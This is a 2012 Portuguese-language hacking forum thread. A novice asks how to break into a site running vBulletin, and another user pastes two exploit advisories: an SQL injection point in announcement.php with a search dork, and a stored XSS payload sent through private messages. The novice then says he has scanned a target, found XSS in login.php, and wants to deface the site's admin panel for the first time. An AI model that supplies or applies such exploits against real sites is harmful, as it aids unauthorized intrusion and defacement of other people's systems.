Unconfigured Ad Widget

**Pwunkz** · 23-04-2012, 10:32

a versăo do forum e vbulletin 4.1.9 existe exploits que permitem acesso..

**posen** · 24-04-2012, 11:15

Ok.. Vou dar uma pesquisada aqui...
Mas se năo for muito encomodo poderia me mandar o código deste exploit?

**Pwunkz** · 24-04-2012, 16:56

Código:

########################################################
#
# Exploit Title : vBulletin 4.1.10 Sql Injection Vulnerabilitiy
#
# Author        : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home          : http://IrIsT.Ir
#
# Software Link : http://vbulletin.com
#
# Security Risk : High
#
# Version       : All Version
#
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork          : "Powered By Vbulletin"
#
########################################################
#
#  Expl0iTs :
#
#  [TarGeT]/announcement.php?a=&announcementid=[Sql]
#
#########################################################
#
# Greats : Zarbat.Org - Aria-Security.Com - datacoders.org - black-hg.org
# 
#     Security7.ir - AjaxTm.Com - Sepehr-Team.Org And All Iranian Hackers
#
#########################################################

Código:

# Exploit Title: vBulletin 4.1.7 => 4.1.10 XSS Vulnerability 
# Google Dork: intitle: powered by vBulletin 4.1.10
# Date: 20/02/2012
# Author: .e0f
# Software Link: [http://www.vbulletin.com/]
# Version: [4.1.10 Others not tested]
# Tested on: [BackTrack 5 | BlackBuntu | Windows 7/xp]
# Contact: [https://twitter.com/#!/e0fx]
# Home: [http://brutezone.ru]
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
# Video: [http://vimeo.com/39049790]
######################################################################################################
Vulnerability:
1.
Send New Private Message > 
                         > 
   Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)
######################################################################################################

Watch the video: [http://vimeo.com/39049790]

##########################################################################################
                       4ll 1nformati0n is pr0vid3d f0r ref3rence 0nly!
##########################################################################################
Greetz to: Babka | F1xeR | ga1Do4ok | Dark-x | Moderor | 2FED | 4elovek 
  v1nest | .e0f | ka0z | silver | Saint | x0r | Duman | ugly | Shadow008 | AlphaSky
   * special thanks to: fpteam-cheats.com | brutezone.ru | From Russia with Love....
###########################################################################################


# 1337day.com [2012-03-24]

**posen** · 25-04-2012, 00:54

qual a programaçăo do exploit ?..
Sorry i'm very noob

**posen** · 25-04-2012, 12:32

Bom, eu fiz a analise aqui pelo acunetix , e o site está vulneravel a XSS
/login.php ...
o login.php está vulneravel, mas como poderei explorar o erro ?
este será meu primeiro Deface t.t

**Pwunkz** · 25-04-2012, 13:01

o exploit năo esta escrito em nenhuma linguagem de programaçăo, estes mostram locais onde pode ser possível fazer injecçăo de SQL e XSS

**posen** · 26-04-2012, 00:12

Nossa. vou ter que estudar e muito , năo consegui fazer nada com este exploit .. nossa!

**posen** · 26-04-2012, 00:27

Postado Originalmente por Pwunkz Ver Post

a versăo do forum e vbulletin 4.1.9 existe exploits que permitem acesso..

e năo é o fórum que eu quero é a admin do site..
fórum năo quero nada kk '

Unconfigured Ad Widget

Anúncio

[Ajuda] Site Vul?

[Ajuda] Site Vul?

Similar Threads

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment